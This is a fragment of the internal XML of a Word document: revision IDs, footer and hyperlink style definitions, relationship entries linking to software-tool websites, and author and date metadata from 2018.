    <w:rsid w:val="00AF611B"/>
    <w:rsid w:val="00B05409"/>
    <w:rsid w:val="00B23932"/>
    <w:rsid w:val="00B33E66"/>
    <w:rsid w:val="00B35922"/>
    <w:rsid w:val="00B42118"/>
    <w:rsid w:val="00B47205"/>
    <w:rsid w:val="00B76E40"/>
    <w:rsid w:val="00B81292"/>
    <w:rsid w:val="00B846B1"/>
    <w:rsid w:val="00BC187D"/>
    <w:rsid w:val="00BF236C"/>
    <w:rsid w:val="00BF2432"/>
    <w:rsid w:val="00BF4737"/>
    <w:rsid w:val="00C110F4"/>
    <w:rsid w:val="00C15F57"/>
    <w:rsid w:val="00C243A9"/>
    <w:rsid w:val="00C4005D"/>
    <w:rsid w:val="00C87C6E"/>
    <w:rsid w:val="00C917B5"/>
    <w:rsid w:val="00C94CAE"/>
    <w:rsid w:val="00CA6958"/>
    <w:rsid w:val="00CB3DC1"/>
    <w:rsid w:val="00CB51FC"/>
    <w:rsid w:val="00CC6AEF"/>
    <w:rsid w:val="00CD576A"/>
    <w:rsid w:val="00D0769D"/>
    <w:rsid w:val="00D1146B"/>
    <w:rsid w:val="00D308ED"/>
    <w:rsid w:val="00D64361"/>
    <w:rsid w:val="00D72188"/>
    <w:rsid w:val="00D92340"/>
    <w:rsid w:val="00D93343"/>
    <w:rsid w:val="00DB7304"/>
    <w:rsid w:val="00DE01AB"/>
    <w:rsid w:val="00DE4E50"/>
    <w:rsid w:val="00E16CB9"/>
    <w:rsid w:val="00E22051"/>
    <w:rsid w:val="00E574D9"/>
    <w:rsid w:val="00E611A5"/>
    <w:rsid w:val="00E86BE2"/>
    <w:rsid w:val="00E930AA"/>
    <w:rsid w:val="00EA18E0"/>
    <w:rsid w:val="00EB3CBA"/>
    <w:rsid w:val="00EC791A"/>
    <w:rsid w:val="00EF20E0"/>
    <w:rsid w:val="00EF2A4B"/>
    <w:rsid w:val="00F012D2"/>
    <w:rsid w:val="00F12DAF"/>
    <w:rsid w:val="00F6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2F6B2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E407FA12-6395-428F-A567-B18989E0F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745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61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7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1BB"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00657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1BB"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00082506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169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69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69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69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696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69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967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020C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omments" Target="comments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home.snafu.de/tilman/xenulink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-306.ibm.com/software/awdtools" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com/0000000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splint.org" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.microsoft.com/office/2011/relationships/people" Target="people.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId19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3090</TotalTime>
  <Pages>32</Pages>
  <Words>5117</Words>
  <Characters>29170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Hoseini</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>MehDi Hoseini</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-06-24T08:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-06-27T12:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>